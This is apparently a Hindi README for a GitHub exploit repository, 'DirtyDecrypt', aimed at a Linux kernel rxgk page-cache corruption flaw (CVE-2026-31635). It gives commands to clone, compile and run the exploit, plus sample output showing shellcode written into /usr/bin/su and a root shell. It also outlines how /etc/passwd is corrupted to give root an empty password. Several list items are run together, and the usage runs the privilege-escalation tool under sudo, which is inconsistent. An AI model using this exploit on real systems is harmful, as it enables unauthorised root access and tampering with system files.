
CVE-2026-31635
लिनक्स कर्नेल स्थानीय विशेषाधिकार वृद्धि (Local Privilege Escalation) RXGK पेज कैश भ्रष्टाचार के माध्यम से
DirtyDecrypt (CVE-2026-31635) लिनक्स कर्नेल के rxrpc उप-प्रणाली (विशेषकर rxgk घटक) में एक स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) कमजोरी है।
यह AES-CBC डिक्रिप्शन के दौरान कॉपी-ऑन-राइट (Copy-on-Write / COW) जांच की कमी का दुरुपयोग करता है, जिससे एक अविशेषाधिकार प्राप्त उपयोगकर्ता पेज कैश को भ्रष्ट कर सकता है और मनमानी फ़ाइल लेखन (arbitrary file writes) प्राप्त कर सकता है, जिससे रूट पहुँच मिलती है।
/etc/passwd को लक्षित करता है (खाली रूट पासवर्ड)CONFIG_RXGK=y के साथ)CONFIG_RXGK=n हैCONFIG_RXGK सक्षम लिनक्स कर्नेलAF_RXRPC सॉकेट समर्थनkeyctl उपयोगिता (rxrpc कुंजियों के लिए)git clone https://github.com/0xBlackash/DirtyDecrypt.git
cd DirtyDecrypt
gcc -O2 -static -pthread CVE-2026-31635.c -o DirtyDecrypt
sudo ./DirtyDecrypt
अपेक्षित सफल आउटपुट:
=== rxgk pagecache write (DirtyDecrypt) ===
uid=1000 euid=1000
[*] /usr/bin/su पर शेलकोड लिखा जा रहा है (ऑफसेट 0 से 96 बाइट्स)
[========================================] 100% (XXX/96, YYYY फायर)
[*] XXX फायर Z.Zs में
[*] /usr/bin/su निष्पादित किया जा रहा है
[*] पुनर्स्थापित करें: cp /tmp/.su_12345 /usr/bin/su
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#
DirtyDecrypt/
├── CVE-2026-31635.c # मुख्य एक्सप्लॉइट
├── README.md # यह फ़ाइल
├── Makefile # वैकल्पिक
└── exploit.log # वैकल्पिक आउटपुट लॉग
AF_RXRPC सॉकेट + splice() का उपयोग करके पेज कैश पृष्ठों को RXGK डिक्रिप्शन पथ में मजबूर करता हैskb_cow_data() के बिना इन-प्लेस AES-CBC डिक्रिप्शन ट्रिगर करता है/etc/passwd) को बाइट दर बाइट भ्रष्ट करता हैयह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।
उन तंत्रों पर अनधिकृत उपयोग जिनके आप मालिक नहीं हैं, अवैध है।
⭐ यदि इसने आपकी सहायता की तो इस रिपो को स्टार करें!
शोध समुदाय के लिए ❤️ से बनाया गया